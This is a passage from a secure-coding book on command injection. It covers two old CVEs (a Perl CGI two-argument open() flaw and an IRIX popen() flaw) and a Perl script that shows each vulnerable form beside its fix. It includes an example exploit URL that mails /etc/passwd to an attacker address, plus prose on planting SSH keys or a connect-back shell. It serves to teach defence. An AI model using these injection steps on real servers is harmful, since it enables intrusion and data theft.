Example Sins

The following entries on the Common Vulnerabilities and Exposures (CVE) web site (http://cve.mitre.org) are examples of command injection vulnerabilities.

CAN-2001-1187

The CSVForm Perl Common Gateway Interface (CGI) script adds records to a comma-separated value (CSV) database file. OmniHTTPd 2.07 web server ships with a script called statsconfig.pl. After the query is parsed, the filename (passed in the file parameter) gets passed to the following code:

 sub modify_CSV {
     if (open(CSV, $_[0])) {   # two-argument open: the mode is read out of $_[0] itself
         ...                   # rest of the routine as shipped
     }
 }

There's no input validation done on the filename, either. Perl's two-argument open() takes the open mode from the string it is given: a leading < or > selects reading or writing, and a trailing | means "run this string as a shell command and read its output." So you can use the cruel trick of adding a pipe to the end of the filename, and the script will execute whatever precedes it.

An example exploit would consist of visiting the following URL:

 http://www.example.com/cgi-bin/csvform.pl?file=mail%20attacker@attacker.org</etc/passwd|

On a UNIX system, the trailing pipe turns the "filename" into the command mail attacker@attacker.org </etc/passwd, which e-mails the system password file to the attacker.

Note that the %20 is a URL-encoded space. The CGI query-parsing code decodes it before the value ever reaches open(), so the shell sees a real space between mail and the address.

The example exploit we give isn't all that interesting these days, because on a modern UNIX system the password hashes live in the shadow file and /etc/passwd only gives up usernames. Attackers will probably decide to do something instead that will allow them to log in, such as write a public key to ~/.ssh/authorized_keys. Or, attackers can actually use this to both upload and run any program they want by writing bytes to a file. Since Perl is obviously already installed on any box running this, an obvious thing to do would be to write a simple Perl script to connect back to the attacker, and on connection, give the attacker a command shell.

CAN-2002-0652

The IRIX file system mounting service allows for remote file system mounting over RPC calls, and is generally installed by default. It turns out that, up until the bug was found in 2002, many of the file checks that the server needed to make when receiving a remote request were implemented by using popen() to run commands from the command line. popen() hands its string to /bin/sh, and the information used in that call was taken directly from the remote user, so a well-placed semicolon in the RPC parameter would terminate the intended command and allow the attacker to run shell commands as root on the box.
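The two entries above are the two shapes command injection usually takes: data that selects a mode (Perl's two-argument open() in CSVForm) and data interpolated into a string handed to /bin/sh (popen() in the IRIX mounting service). The following Perl script is an added example written for this page; it is not code from the book, from OmniHTTPd or from IRIX. It shows each vulnerable form beside a fixed form, using Perl's string-form backticks in place of C's popen() (both go through the shell, so the semicolon behaves the same way). The /var/www/data directory, the function names and the harmless echo commands standing in for the mail attacker@... payload are all assumptions made for the demonstration.

```perl
#!/usr/bin/perl
# Added example: the two injection shapes from this section, each beside a fix.
use strict;
use warnings;

# --- Shape 1: two-argument open(), as in modify_CSV -----------------------
# open(FH, $spec) reads the *mode* out of $spec: a leading '<' or '>' chooses
# read/write, and a trailing '|' means "run $spec as a command and read its
# output". Untrusted data therefore decides between opening a file and
# executing a program.
sub read_csv_vulnerable {
    my ($spec) = @_;
    open(CSV, $spec) or return;          # sin: mode comes from attacker data
    my @lines = <CSV>;
    close(CSV);
    return \@lines;
}

# Fix: three-argument open() pins the mode to '<', so $name can only ever be
# a path. The name is also restricted to a tight character whitelist (no '/',
# no '|', no leading dot) and anchored under a fixed directory.
sub read_csv_fixed {
    my ($name, $dir) = @_;               # $dir: the application's CSV directory (assumed)
    return unless defined $name
        && $name =~ /\A[A-Za-z0-9][A-Za-z0-9_.-]{0,63}\z/;
    open(my $fh, '<', "$dir/$name") or return;
    my @lines = <$fh>;
    close($fh);
    return \@lines;
}

# --- Shape 2: metacharacters in a shell command string (the IRIX popen() bug)
# One-string backticks and system() hand the string to /bin/sh exactly as C's
# popen() does, so ';' in the data ends our command and starts the attacker's.
sub list_dir_vulnerable {
    my ($dir) = @_;
    return scalar `ls -1 $dir`;          # sin: $dir is interpolated into a shell command
}

# Fix: the list form of pipe-open execs ls directly with an argv array and no
# shell, so the whole string is a single argument and ';' is just a character
# in a (nonexistent) filename.
sub list_dir_fixed {
    my ($dir) = @_;
    open(my $ls, '-|', 'ls', '-1', $dir) or return;
    my @out = <$ls>;
    close($ls);                          # non-zero exit from ls is expected here
    return join('', @out);
}

# Constructed inputs standing in for attacker-controlled request data.
my $pipe_trick = 'echo injected_by_open|';
my $semi_trick = '/nonexistent; echo injected_by_semicolon';

my $r = read_csv_vulnerable($pipe_trick);
print "2-arg open ran a command: ", @$r if $r;
print "3-arg open rejected the same string\n"
    unless read_csv_fixed($pipe_trick, '/var/www/data');

print "shell string ran the extra command: ", list_dir_vulnerable($semi_trick);
my $safe = list_dir_fixed($semi_trick);
print "list form passed it as one argument, output: '",
    (defined $safe ? $safe : ''), "'\n";
```

Run it on any UNIX-like host: the first and third lines of output show the injected echo text, while the fixed variants reject the filename outright and pass the semicolon string to ls as a single argument (ls complains on stderr that no such file exists, which is the correct outcome). The general rule both fixes share is that the mode, the program and the argument boundaries are decided by the code, never by the data.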



19 Deadly Sins of Software Security. Programming Flaws and How to Fix Them
ISBN: 71626751
Year: 2003
Pages: 239
